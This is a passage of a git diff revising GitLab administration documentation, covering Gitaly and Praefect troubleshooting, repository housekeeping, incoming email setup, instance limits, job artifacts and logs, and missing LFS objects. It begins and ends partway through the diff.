"{\"GIT_ALTERNATE_OBJECT_DIRECTORIES\":[],\"GIT_ALTERNATE_OBJECT_DIRECTORIES_RELATIVE\":[],\"GIT_OBJECT_DIRECTORY\":null,\"GIT_OBJECT_DIRECTORY_RELATIVE\":null}" + }, + { + "key": "user_id", + "value": "2" + }, + { + "key": "secret_token", + "value": "[FILTERED]" + } + ], + "host": "gitlab.example.com", + "ip": "REDACTED", + "ua": "Ruby", + "route": "\/api\/:version\/internal\/allowed", + "queue_duration": 4.24, + "gitaly_calls": 0, + "gitaly_duration": 0, + "correlation_id": "XPUZqTukaP3" + } + + # nginx_access.log + [IP] - - [18/Jul/2019:00:30:14 +0000] "POST /api/v4/internal/allowed HTTP/1.1" 401 30 "" "Ruby" + ``` + +To fix this problem, confirm that your [`gitlab-secrets.json` file](configure_gitaly.md#configure-gitaly-servers) +on the Gitaly server matches the one on Gitaly client. If it doesn't match, +update the secrets file on the Gitaly server to match the Gitaly client, then +[reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure). + +### Command line tools cannot connect to Gitaly + +gRPC cannot reach your Gitaly server if: + +- You can't connect to a Gitaly server with command-line tools. +- Certain actions result in a `14: Connect Failed` error message. + +Verify you can reach Gitaly by using TCP: + +```shell +sudo gitlab-rake gitlab:tcp_check[GITALY_SERVER_IP,GITALY_LISTEN_PORT] +``` + +If the TCP connection: + +- Fails, check your network settings and your firewall rules. +- Succeeds, your networking and firewall rules are correct. + +If you use proxy servers in your command line environment such as Bash, these can interfere with +your gRPC traffic. + +If you use Bash or a compatible command line environment, run the following commands to determine +whether you have proxy servers configured: + +```shell +echo $http_proxy +echo $https_proxy +``` + +If either of these variables have a value, your Gitaly CLI connections may be getting routed through +a proxy which cannot connect to Gitaly. + +To remove the proxy setting, run the following commands (depending on which variables had values): + +```shell +unset http_proxy +unset https_proxy +``` + +### Permission denied errors appearing in Gitaly or Praefect logs when accessing repositories + +You might see the following in Gitaly and Praefect logs: + +```shell +{ + ... + "error":"rpc error: code = PermissionDenied desc = permission denied", + "grpc.code":"PermissionDenied", + "grpc.meta.client_name":"gitlab-web", + "grpc.request.fullMethod":"/gitaly.ServerService/ServerInfo", + "level":"warning", + "msg":"finished unary call with code PermissionDenied", + ... +} +``` + +This is a GRPC call +[error response code](https://grpc.github.io/grpc/core/md_doc_statuscodes.html). + +If this error occurs, even though +[the Gitaly auth tokens are set up correctly](#praefect-errors-in-logs), +it's likely that the Gitaly servers are experiencing +[clock drift](https://en.wikipedia.org/wiki/Clock_drift). + +Ensure the Gitaly clients and servers are synchronized, and use an NTP time +server to keep them synchronized. + +### Gitaly not listening on new address after reconfiguring + +When updating the `gitaly['listen_addr']` or `gitaly['prometheus_listen_addr']` values, Gitaly may +continue to listen on the old address after a `sudo gitlab-ctl reconfigure`. + +When this occurs, run `sudo gitlab-ctl restart` to resolve the issue. This should no longer be +necessary because [this issue](https://gitlab.com/gitlab-org/gitaly/-/issues/2521) is resolved. + +### Permission denied errors appearing in Gitaly logs when accessing repositories from a standalone Gitaly node + +If this error occurs even though file permissions are correct, it's likely that the Gitaly node is +experiencing [clock drift](https://en.wikipedia.org/wiki/Clock_drift). + +Please ensure that the GitLab and Gitaly nodes are synchronized and use an NTP time +server to keep them synchronized if possible. + +## Troubleshoot Praefect (Gitaly Cluster) + +The following sections provide possible solutions to Gitaly Cluster errors. + +### Praefect errors in logs + +If you receive an error, check `/var/log/gitlab/gitlab-rails/production.log`. + +Here are common errors and potential causes: + +- 500 response code + - **ActionView::Template::Error (7:permission denied)** + - `praefect['auth_token']` and `gitlab_rails['gitaly_token']` do not match on the GitLab server. + - **Unable to save project. Error: 7:permission denied** + - Secret token in `praefect['storage_nodes']` on GitLab server does not match the + value in `gitaly['auth_token']` on one or more Gitaly servers. +- 503 response code + - **GRPC::Unavailable (14:failed to connect to all addresses)** + - GitLab was unable to reach Praefect. + - **GRPC::Unavailable (14:all SubCons are in TransientFailure...)** + - Praefect cannot reach one or more of its child Gitaly nodes. Try running + the Praefect connection checker to diagnose. + +### Determine primary Gitaly node + +To determine the current primary Gitaly node for a specific Praefect node: + +- Use the `Shard Primary Election` [Grafana chart](praefect.md#grafana) on the + [`Gitlab Omnibus - Praefect` dashboard](https://gitlab.com/gitlab-org/grafana-dashboards/-/blob/master/omnibus/praefect.json). + This is recommended. +- If you do not have Grafana set up, use the following command on each host of each + Praefect node: + + ```shell + curl localhost:9652/metrics | grep gitaly_praefect_primaries` + ``` + +### Relation does not exist errors + +By default Praefect database tables are created automatically by `gitlab-ctl reconfigure` task. + +However, the Praefect database tables are not created on initial reconfigure and can throw +errors that relations do not exist if either: + +- The `gitlab-ctl reconfigure` command isn't executed. +- There are errors during the execution. + +For example: + +- `ERROR: relation "node_status" does not exist at character 13` +- `ERROR: relation "replication_queue_lock" does not exist at character 40` +- This error: + + ```json + {"level":"error","msg":"Error updating node: pq: relation \"node_status\" does not exist","pid":210882,"praefectName":"gitlab1x4m:0.0.0.0:2305","time":"2021-04-01T19:26:19.473Z","virtual_storage":"praefect-cluster-1"} + ``` + +To solve this, the database schema migration can be done using `sql-migrate` sub-command of +the `praefect` command: + +```shell +$ sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml sql-migrate +praefect sql-migrate: OK (applied 21 migrations) +``` diff --git a/doc/administration/housekeeping.md b/doc/administration/housekeeping.md index a89e8a2bad5..8f5bf2ee013 100644 --- a/doc/administration/housekeeping.md +++ b/doc/administration/housekeeping.md @@ -4,46 +4,68 @@ group: Distribution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Housekeeping **(FREE)** +# Housekeeping **(FREE SELF)** -GitLab supports and automates housekeeping tasks within your current repository, -such as compressing file revisions and removing unreachable objects. +GitLab supports and automates housekeeping tasks within your current repository such as: + +- Compressing Git objects. +- Removing unreachable objects. ## Configure housekeeping -GitLab automatically runs `git gc` and `git repack` on repositories -after Git pushes. +GitLab automatically runs `git gc` and `git repack` on repositories after Git pushes: + +- [`git gc`](https://git-scm.com/docs/git-gc) runs a number of housekeeping tasks such as: + - Compressing Git objects to reduce disk space and increase performance. + - Removing unreachable objects that may have been created from changes to the repository, like force-overwriting branches. +- [`git repack`](https://git-scm.com/docs/git-repack) either: + - Runs an incremental repack, according to a [configured period](#housekeeping-options). This + packs all loose objects into a new packfile and prunes the now-redundant loose objects. + - Runs a full repack, according to a [configured period](#housekeeping-options). This repacks all + packfiles and loose objects into a single new packfile, and deletes the old now-redundant loose + objects and packfiles. It also optionally creates bitmaps for the new packfile. You can change how often this happens or turn it off: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Settings > Repository**. 1. Expand **Repository maintenance**. -1. Configure the Housekeeping options. +1. In the **Housekeeping** section, configure the [housekeeping options](#housekeeping-options). 1. Select **Save changes**. -For example, in the following scenario a `git repack -d` will be executed: +### Housekeeping options + +The following housekeeping options are available: + +- **Enable automatic repository housekeeping**: Regularly run `git repack` and `git gc`. If you + keep this setting disabled for a long time, Git repository access on your GitLab server becomes + slower and your repositories use more disk space. +- **Enable Git pack file bitmap creation**: Create pack file bitmaps which accelerates `git clone` + performance. Makes housekeeping take a little longer. +- **Incremental repack period**: Number of Git pushes after which an incremental `git repack` is + run. +- **Full repack period**: Number of Git pushes after which a full `git repack` is run. +- **Git GC period**: Number of Git pushes after which `git gc` is run. + +As an example, see the following scenario: -- Project: pushes since GC counter (`pushes_since_gc`) = `10` -- Git GC period = `200` -- Full repack period = `50` +- Incremental repack period: 10. +- Full repack period: 50. +- Git GC period: 200. -When the `pushes_since_gc` value is 50 a `repack -A -d --pack-kept-objects` runs, similarly when -the `pushes_since_gc` value is 200 a `git gc` runs: +When the: -- `git gc` ([man page](https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-gc.html)) runs a number of housekeeping tasks, - such as compressing file revisions (to reduce disk space and increase performance) - and removing unreachable objects which may have been created from prior invocations of - `git add`. -- `git repack` ([man page](https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-repack.html)) re-organize existing packs into a single, more efficient pack. +- `pushes_since_gc` value is 50, a `repack -A -l -d --pack-kept-objects` runs. +- `pushes_since_gc` value is 200, a `git gc` runs. Housekeeping also [removes unreferenced LFS files](../raketasks/cleanup.md#remove-unreferenced-lfs-files) -from your project on the same schedule as the `git gc` operation, freeing up storage space for your project. +from your project on the same schedule as the `git gc` operation, freeing up storage space for your +project. ## How housekeeping handles pool repositories -Housekeeping for pool repositories is handled differently from standard repositories. -It is ultimately performed by the Gitaly RPC `FetchIntoObjectPool`. +Housekeeping for pool repositories is handled differently from standard repositories. It is +ultimately performed by the Gitaly RPC `FetchIntoObjectPool`. This is the current call stack by which it is invoked: @@ -54,10 +76,10 @@ This is the current call stack by which it is invoked: 1. `ObjectPoolService#fetch` 1. `Gitaly::FetchIntoObjectPoolRequest` -To manually invoke it from a Rails console, if needed, you can call `project.pool_repository.object_pool.fetch`. -This is a potentially long-running task, though Gitaly times out in about 8 hours. +To manually invoke it from a Rails console if needed, you can call +`project.pool_repository.object_pool.fetch`. This is a potentially long-running task, though Gitaly +times out in about 8 hours. WARNING: -Do not run `git prune` or `git gc` in pool repositories! This can -cause data loss in "real" repositories that depend on the pool in -question. +Do not run `git prune` or `git gc` in pool repositories! This can cause data loss in "real" +repositories that depend on the pool in question. diff --git a/doc/administration/img/repository_storages_admin_ui_v13_1.png b/doc/administration/img/repository_storages_admin_ui_v13_1.png Binary files differdeleted file mode 100644 index a2b88d14a36..00000000000 --- a/doc/administration/img/repository_storages_admin_ui_v13_1.png +++ /dev/null diff --git a/doc/administration/incoming_email.md b/doc/administration/incoming_email.md index 56af5f56cfa..c5cabc5794a 100644 --- a/doc/administration/incoming_email.md +++ b/doc/administration/incoming_email.md @@ -6,25 +6,25 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Incoming email **(FREE SELF)** -GitLab has several features based on receiving incoming emails: +GitLab has several features based on receiving incoming email messages: - [Reply by Email](reply_by_email.md): allow GitLab users to comment on issues - and merge requests by replying to notification emails. + and merge requests by replying to notification email. - [New issue by email](../user/project/issues/managing_issues.md#new-issue-via-email): allow GitLab users to create a new issue by sending an email to a user-specific email address. -- [New merge request by email](../user/project/merge_requests/creating_merge_requests.md#new-merge-request-by-email): +- [New merge request by email](../user/project/merge_requests/creating_merge_requests.md#by-sending-an-email): allow GitLab users to create a new merge request by sending an email to a user-specific email address. -- [Service Desk](../user/project/service_desk.md): provide e-mail support to +- [Service Desk](../user/project/service_desk.md): provide email support to your customers through GitLab. ## Requirements We recommend using an email address that receives **only** messages that are intended for -the GitLab instance. Any incoming emails not intended for GitLab receive a reject notice. +the GitLab instance. Any incoming email messages not intended for GitLab receive a reject notice. -Handling incoming emails requires an [IMAP](https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol)-enabled +Handling incoming email messages requires an [IMAP](https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol)-enabled email account. GitLab requires one of the following three strategies: - Email sub-addressing (recommended) @@ -53,7 +53,7 @@ leaving a catch-all available for other purposes beyond GitLab. ### Catch-all mailbox A [catch-all mailbox](https://en.wikipedia.org/wiki/Catch-all) for a domain -receives all emails addressed to the domain that do not match any addresses that +receives all email messages addressed to the domain that do not match any addresses that exist on the mail server. As of GitLab 11.7, catch-all mailboxes support the same features as @@ -68,7 +68,7 @@ this method only supports replies, and not the other features of [incoming email ## Set it up -If you want to use Gmail / Google Apps for incoming emails, make sure you have +If you want to use Gmail / Google Apps for incoming email, make sure you have [IMAP access enabled](https://support.google.com/mail/answer/7126229) and [allowed less secure apps to access the account](https://support.google.com/accounts/answer/6010255) or [turn-on 2-step validation](https://support.google.com/accounts/answer/185839) @@ -95,7 +95,7 @@ email address to sign up. If you also host a public-facing GitLab instance at `hooli.com` and set your incoming email domain to `hooli.com`, an attacker could abuse the "Create new issue by email" or -"[Create new merge request by email](../user/project/merge_requests/creating_merge_requests.md#new-merge-request-by-email)" +"[Create new merge request by email](../user/project/merge_requests/creating_merge_requests.md#by-sending-an-email)" features by using a project's unique address as the email when signing up for Slack. This would send a confirmation email, which would create a new issue or merge request on the project owned by the attacker, allowing them to click the diff --git a/doc/administration/index.md b/doc/administration/index.md index 69e8689c589..74c89b4d5c0 100644 --- a/doc/administration/index.md +++ b/doc/administration/index.md @@ -43,8 +43,8 @@ Learn how to install, configure, update, and maintain your GitLab instance. - [Adjust your instance's timezone](timezone.md): Customize the default time zone of GitLab. - [System hooks](../system_hooks/system_hooks.md): Notifications when users, projects and keys are changed. -- [Security](../security/README.md): Learn what you can do to further secure your GitLab instance. -- [Usage statistics, version check, and usage ping](../user/admin_area/settings/usage_statistics.md): Enable or disable information about your instance to be sent to GitLab, Inc. +- [Security](../security/index.md): Learn what you can do to further secure your GitLab instance. +- [Usage statistics, version check, and Service Ping](../user/admin_area/settings/usage_statistics.md): Enable or disable information about your instance to be sent to GitLab, Inc. - [Global user settings](user_settings.md): Configure instance-wide user permissions. - [Polling](polling.md): Configure how often the GitLab UI polls for updates. - [GitLab Pages configuration](pages/index.md): Enable and configure GitLab Pages. @@ -122,7 +122,7 @@ Learn how to install, configure, update, and maintain your GitLab instance. - [Libravatar](libravatar.md): Use Libravatar instead of Gravatar for user avatars. - [Sign-up restrictions](../user/admin_area/settings/sign_up_restrictions.md): block email addresses of specific domains, or whitelist only specific domains. - [Access restrictions](../user/admin_area/settings/visibility_and_access_controls.md#enabled-git-access-protocols): Define which Git access protocols can be used to talk to GitLab (SSH, HTTP, HTTPS). -- [Authentication and Authorization](auth/README.md): Configure external authentication with LDAP, SAML, CAS, and additional providers. +- [Authentication and Authorization](auth/index.md): Configure external authentication with LDAP, SAML, CAS, and additional providers. - [Sync LDAP](auth/ldap/index.md) - [Kerberos authentication](../integration/kerberos.md) - See also other [authentication](../topics/authentication/index.md#gitlab-administrators) topics (for example, enforcing 2FA). @@ -134,7 +134,7 @@ Learn how to install, configure, update, and maintain your GitLab instance. - [Auditor users](auditor_users.md): Users with read-only access to all projects, groups, and other resources on the GitLab instance. - [Incoming email](incoming_email.md): Configure incoming emails to allow users to [reply by email](reply_by_email.md), create [issues by email](../user/project/issues/managing_issues.md#new-issue-via-email) and - [merge requests by email](../user/project/merge_requests/creating_merge_requests.md#new-merge-request-by-email), and to enable [Service Desk](../user/project/service_desk.md). + [merge requests by email](../user/project/merge_requests/creating_merge_requests.md#by-sending-an-email), and to enable [Service Desk](../user/project/service_desk.md). - [Postfix for incoming email](reply_by_email_postfix_setup.md): Set up a basic Postfix mail server with IMAP authentication on Ubuntu for incoming emails. @@ -146,7 +146,7 @@ Learn how to install, configure, update, and maintain your GitLab instance. - [Issue closing pattern](issue_closing_pattern.md): Customize how to close an issue from commit messages. - [Gitaly](gitaly/index.md): Configuring Gitaly, the Git repository storage service for GitLab. - [Default labels](../user/admin_area/labels.md): Create labels that are automatically added to every new project. -- [Restrict the use of public or internal projects](../public_access/public_access.md#restricting-the-use-of-public-or-internal-projects): Restrict the use of visibility levels for users when they create a project or a snippet. +- [Restrict the use of public or internal projects](../public_access/public_access.md#restrict-use-of-public-or-internal-projects): Restrict the use of visibility levels for users when they create a project or a snippet. - [Custom project templates](../user/admin_area/custom_project_templates.md): Configure a set of projects to be used as custom templates when creating a new project. ## Package Registry administration @@ -241,7 +241,7 @@ who are aware of the risks. - [GitLab Rails console commands](troubleshooting/gitlab_rails_cheat_sheet.md) (for Support Engineers) - [Troubleshooting SSL](troubleshooting/ssl.md) - Related links: - - [GitLab Developer Documentation](../development/README.md) + - [GitLab Developer Documentation](../development/index.md) - [Repairing and recovering broken Git repositories](https://git.seveas.net/repairing-and-recovering-broken-git-repositories.html) - [Testing with OpenSSL](https://www.feistyduck.com/library/openssl-cookbook/online/ch-testing-with-openssl.html) - [`strace` zine](https://wizardzines.com/zines/strace/) diff --git a/doc/administration/instance_limits.md b/doc/administration/instance_limits.md index 9423045e3b5..5e0d87cd7b6 100644 --- a/doc/administration/instance_limits.md +++ b/doc/administration/instance_limits.md @@ -115,10 +115,7 @@ Limit the maximum daily member invitations allowed per group hierarchy. ### Webhook rate limit > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61151) in GitLab 13.12. -> - [Deployed behind a feature flag](../user/feature_flags.md), disabled by default. -> - Disabled on GitLab.com. -> - Not recommended for production use. -> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-rate-limiting-for-webhooks). **(FREE SELF)** +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/330133) in GitLab 14.1. Limit the number of times any given webhook can be called per minute. This only applies to project and group webhooks. @@ -136,25 +133,6 @@ Set the limit to `0` to disable it. - **Default rate limit**: Disabled. -#### Enable or disable rate limiting for webhooks **(FREE SELF)** - -Rate limiting for webhooks is under development and not ready for production use. It is -deployed behind a feature flag that is **disabled by default**. -[GitLab administrators with access to the GitLab Rails console](../administration/feature_flags.md) -can enable it. - -To enable it: - -```ruby -Feature.enable(:web_hooks_rate_limit) -``` - -To disable it: - -```ruby -Feature.disable(:web_hooks_rate_limit) -``` - ## Gitaly concurrency limit Clone traffic can put a large strain on your Gitaly service. To prevent such workloads from overwhelming your Gitaly server, you can set concurrency limits in Gitaly's configuration file. @@ -169,7 +147,7 @@ Read more about [Gitaly concurrency limits](gitaly/configure_gitaly.md#limit-rpc There's a limit to the number of comments that can be submitted on an issue, merge request, or commit. When the limit is reached, system notes can still be -added so that the history of events is not lost, but the user-submitted +added so that the history of events is not lost, but the user-submitted comment fails. - **Max limit**: 5,000 comments. @@ -214,7 +192,7 @@ The number of pipelines that can be created in a single push is 4. This is to prevent the accidental creation of pipelines when `git push --all` or `git push --mirror` is used. -Read more in the [CI documentation](../ci/yaml/README.md#processing-git-pushes). +Read more in the [CI documentation](../ci/yaml/index.md#processing-git-pushes). ## Retention of activity history @@ -286,7 +264,7 @@ and to limit memory consumption. When using offset-based pagination in the REST API, there is a limit to the maximum requested offset into the set of results. This limit is only applied to endpoints that support keyset-based pagination. More information about pagination options can be -found in the [API docs section on pagination](../api/README.md#pagination). +found in the [API docs section on pagination](../api/index.md#pagination). To set this limit for a self-managed installation, run the following in the [GitLab Rails console](operations/rails_console.md#starting-a-rails-console-session): @@ -429,7 +407,7 @@ Plan.default.actual_limits.update!(ci_instance_level_variables: 30) > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37226) in GitLab 13.3. -Job artifacts defined with [`artifacts:reports`](../ci/yaml/README.md#artifactsreports) +Job artifacts defined with [`artifacts:reports`](../ci/yaml/index.md#artifactsreports) that are uploaded by the runner are rejected if the file size exceeds the maximum file size limit. The limit is determined by comparing the project's [maximum artifact size setting](../user/admin_area/settings/continuous_integration.md#maximum-artifacts-size) @@ -443,33 +421,34 @@ setting is used: | Artifact limit name | Default value | |---------------------------------------------|---------------| -| `ci_max_artifact_size_accessibility` | 0 | -| `ci_max_artifact_size_api_fuzzing` | 0 | -| `ci_max_artifact_size_archive` | 0 | -| `ci_max_artifact_size_browser_performance` | 0 | -| `ci_max_artifact_size_cluster_applications` | 0 | -| `ci_max_artifact_size_cobertura` | 0 | -| `ci_max_artifact_size_codequality` | 0 | -| `ci_max_artifact_size_container_scanning` | 0 | -| `ci_max_artifact_size_coverage_fuzzing` | 0 | -| `ci_max_artifact_size_dast` | 0 | -| `ci_max_artifact_size_dependency_scanning` | 0 | -| `ci_max_artifact_size_dotenv` | 0 | -| `ci_max_artifact_size_junit` | 0 | -| `ci_max_artifact_size_license_management` | 0 | -| `ci_max_artifact_size_license_scanning` | 0 | -| `ci_max_artifact_size_load_performance` | 0 | -| `ci_max_artifact_size_lsif` | 100 MB ([Introduced at 20 MB](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37226) in GitLab 13.3 and [raised to 100 MB](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/46980) in GitLab 13.6.) | -| `ci_max_artifact_size_metadata` | 0 | -| `ci_max_artifact_size_metrics_referee` | 0 | -| `ci_max_artifact_size_metrics` | 0 | -| `ci_max_artifact_size_network_referee` | 0 | -| `ci_max_artifact_size_performance` | 0 | -| `ci_max_artifact_size_requirements` | 0 | -| `ci_max_artifact_size_sast` | 0 | -| `ci_max_artifact_size_secret_detection` | 0 | -| `ci_max_artifact_size_terraform` | 5 MB ([introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37018) in GitLab 13.3) | -| `ci_max_artifact_size_trace` | 0 | +| `ci_max_artifact_size_accessibility` | 0 | +| `ci_max_artifact_size_api_fuzzing` | 0 | +| `ci_max_artifact_size_archive` | 0 | +| `ci_max_artifact_size_browser_performance` | 0 | +| `ci_max_artifact_size_cluster_applications` | 0 | +| `ci_max_artifact_size_cluster_image_scanning` | 0 | +| `ci_max_artifact_size_cobertura` | 0 | +| `ci_max_artifact_size_codequality` | 0 | +| `ci_max_artifact_size_container_scanning` | 0 | +| `ci_max_artifact_size_coverage_fuzzing` | 0 | +| `ci_max_artifact_size_dast` | 0 | +| `ci_max_artifact_size_dependency_scanning` | 0 | +| `ci_max_artifact_size_dotenv` | 0 | +| `ci_max_artifact_size_junit` | 0 | +| `ci_max_artifact_size_license_management` | 0 | +| `ci_max_artifact_size_license_scanning` | 0 | +| `ci_max_artifact_size_load_performance` | 0 | +| `ci_max_artifact_size_lsif` | 100 MB ([Introduced at 20 MB](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37226) in GitLab 13.3 and [raised to 100 MB](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/46980) in GitLab 13.6.) | +| `ci_max_artifact_size_metadata` | 0 | +| `ci_max_artifact_size_metrics_referee` | 0 | +| `ci_max_artifact_size_metrics` | 0 | +| `ci_max_artifact_size_network_referee` | 0 | +| `ci_max_artifact_size_performance` | 0 | +| `ci_max_artifact_size_requirements` | 0 | +| `ci_max_artifact_size_sast` | 0 | +| `ci_max_artifact_size_secret_detection` | 0 | +| `ci_max_artifact_size_terraform` | 5 MB ([introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37018) in GitLab 13.3) | +| `ci_max_artifact_size_trace` | 0 | For example, to set the `ci_max_artifact_size_junit` limit to 10 MB on a self-managed installation, run the following in the [GitLab Rails console](operations/rails_console.md#starting-a-rails-console-session): @@ -503,6 +482,46 @@ A runner's registration fails if it exceeds the limit for the scope determined b Plan.default.actual_limits.update!(ci_registered_project_runners: 100) ``` +### Maximum file size for job logs + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276192) in GitLab 14.1. +> - [Deployed behind a feature flag](../user/feature_flags.md), disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-job-log-limits). **(FREE SELF)** + +This in-development feature might not be available for your use. There can be +[risks when enabling features still in development](../user/feature_flags.md#risks-when-enabling-features-still-in-development). +Refer to this feature's version history for more details. + +The job log file size limit is 100 megabytes by default. Any job that exceeds this value is dropped. + +You can change the limit in the [GitLab Rails console](operations/rails_console.md#starting-a-rails-console-session). +Update `ci_jobs_trace_size_limit` with the new value in megabytes: + +```ruby +Plan.default.actual_limits.update!(ci_jobs_trace_size_limit: 125) +``` + +#### Enable or disable job log limits **(FREE SELF)** + +This feature is under development and not ready for production use. It is +deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:ci_jobs_trace_size_limit) +``` + +To disable it: + +```ruby +Feature.disable(:ci_jobs_trace_size_limit) +``` + ## Instance monitoring and metrics ### Incident Management inbound alert limits @@ -597,7 +616,7 @@ prevent any more changes from rendering. For more information about these limits Reports that go over the 20 MB limit won't be loaded. Affected reports: - [Merge request security reports](../user/project/merge_requests/testing_and_reports_in_merge_requests.md#security-reports) -- [CI/CD parameter `artifacts:expose_as`](../ci/yaml/README.md#artifactsexpose_as) +- [CI/CD parameter `artifacts:expose_as`](../ci/yaml/index.md#artifactsexpose_as) - [Unit test reports](../ci/unit_test_reports.md) ## Advanced Search limits @@ -607,7 +626,7 @@ Reports that go over the 20 MB limit won't be loaded. Affected reports: > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/8638) in GitLab 13.3. You can set a limit on the content of repository files that are indexed in -Elasticsearch. Any files larger than this limit is neither indexed +Elasticsearch. Any files larger than this limit is neither indexed nor searchable. Setting a limit helps reduce the memory usage of the indexing processes and diff --git a/doc/administration/job_artifacts.md b/doc/administration/job_artifacts.md index 99eb1395503..3b1d253b4b6 100644 --- a/doc/administration/job_artifacts.md +++ b/doc/administration/job_artifacts.md @@ -42,10 +42,10 @@ To disable artifacts site-wide, follow the steps below. GitLab Runner can upload an archive containing the job artifacts to GitLab. By default, this is done when the job succeeds, but can also be done on failure, or always, via the -[`artifacts:when`](../ci/yaml/README.md#artifactswhen) parameter. +[`artifacts:when`](../ci/yaml/index.md#artifactswhen) parameter. Most artifacts are compressed by GitLab Runner before being sent to the coordinator. The exception to this is -[reports artifacts](../ci/yaml/README.md#artifactsreports), which are compressed after uploading. +[reports artifacts](../ci/yaml/index.md#artifactsreports), which are compressed after uploading. ### Using local storage @@ -326,7 +326,7 @@ To migrate back to local storage: ## Expiring artifacts -If [`artifacts:expire_in`](../ci/yaml/README.md#artifactsexpire_in) is used to set +If [`artifacts:expire_in`](../ci/yaml/index.md#artifactsexpire_in) is used to set an expiry for the artifacts, they are marked for deletion right after that date passes. Otherwise, they expire per the [default artifacts expiration setting](../user/admin_area/settings/continuous_integration.md). diff --git a/doc/administration/job_logs.md b/doc/administration/job_logs.md index 510da68442c..87dd365769f 100644 --- a/doc/administration/job_logs.md +++ b/doc/administration/job_logs.md @@ -108,7 +108,7 @@ See "Phase 4: uploading" in [Data flow](#data-flow) to learn about the process. If you want to avoid any local disk usage for job logs, you can do so using one of the following options: -- Enable the [beta incremental logging](#incremental-logging-architecture) feature. +- Enable the [incremental logging](#incremental-logging-architecture) feature. - Set the [job logs location](#changing-the-job-logs-local-location) to an NFS drive. @@ -140,17 +140,17 @@ For more information, see [delete references to missing artifacts](raketasks/che > - [Recommended for production use with AWS S3](https://gitlab.com/gitlab-org/gitlab/-/issues/273498) in GitLab 13.7. > - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-incremental-logging). **(FREE SELF)** -Job logs are sent from the GitLab Runner in chunks and cached temporarily on disk +By default job logs are sent from the GitLab Runner in chunks and cached temporarily on disk in `/var/opt/gitlab/gitlab-ci/builds` by Omnibus GitLab. After the job completes, a background job archives the job log. The log is moved to `/var/opt/gitlab/gitlab-rails/shared/artifacts/` by default, or to object storage if configured. -In a [scaled-out architecture](reference_architectures/index.md) with Rails and Sidekiq running on more than one +In a [scaled-out architecture](reference_architectures/index.md) with Rails and Sidekiq running on more than one server, these two locations on the filesystem have to be shared using NFS. To eliminate both filesystem requirements: -- Enable the incremental logging feature, which uses Redis instead of disk space for temporary caching of job logs. +- [Enable the incremental logging feature](#enable-or-disable-incremental-logging), which uses Redis instead of disk space for temporary caching of job logs. - Configure [object storage](job_artifacts.md#object-storage-settings) for storing archived job logs. ### Technical details @@ -162,7 +162,7 @@ file storage. Redis is used as first-class storage, and it stores up-to 128KB of data. After the full chunk is sent, it is flushed to a persistent store, either object storage (temporary directory) or database. After a while, the data in Redis and a persistent store is archived to [object storage](#uploading-logs-to-object-storage). -The data are stored in the following Redis namespace: `Gitlab::Redis::SharedState`. +The data are stored in the following Redis namespace: `Gitlab::Redis::TraceChunks`. Here is the detailed data flow: @@ -185,7 +185,7 @@ Here is the detailed data flow: ### Enable or disable incremental logging **(FREE SELF)** -Incremental logging is under development, but ready for production use. It is +Incremental logging is under development, but [ready for production use as of GitLab 13.6](https://gitlab.com/groups/gitlab-org/-/epics/4275). It is deployed behind a feature flag that is **disabled by default**. [GitLab administrators with access to the GitLab Rails console](feature_flags.md) can enable it. diff --git a/doc/administration/lfs/index.md b/doc/administration/lfs/index.md index 862c26abac8..edf0e324a5c 100644 --- a/doc/administration/lfs/index.md +++ b/doc/administration/lfs/index.md @@ -243,7 +243,52 @@ You can see the total storage used for LFS objects on groups and projects: - In the administration area. - In the [groups](../../api/groups.md) and [projects APIs](../../api/projects.md). -## Troubleshooting: `Google::Apis::TransmissionError: execution expired` +## Troubleshooting + +### Missing LFS objects + +An error about a missing LFS object may occur in either of these situations: + +- When migrating LFS objects from disk to object storage, with error messages like: + + ```plaintext + ERROR -- : Failed to transfer LFS object + 006622269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 + with error: No such file or directory @ rb_sysopen - + /var/opt/gitlab/gitlab-rails/shared/lfs-objects/00/66/22269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 + ``` + + (Line breaks have been added for legibility.) + +- When running the + [integrity check for LFS objects](../raketasks/check.md#uploaded-files-integrity) + with the `VERBOSE=1` parameter. + +The database can have records for LFS objects which are not on disk. The database entry may +[prevent a new copy of the object from being pushed](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49241). +To delete these references: + +1. [Start a rails console](../operations/rails_console.md). +1. Query the object that's reported as missing in the rails console, to return a file path: + + ```ruby + lfs_object = LfsObject.find_by(oid: '006622269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7') + lfs_object.file.path + ``` + +1. Check on disk or object storage if it exists: + + ```shell + ls -al /var/opt/gitlab/gitlab-rails/shared/lfs-objects/00/66/22269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 + ``` + +1. If the file is not present, remove the database record via the rails console: + + ```ruby + lfs_object.destroy + ``` + +### 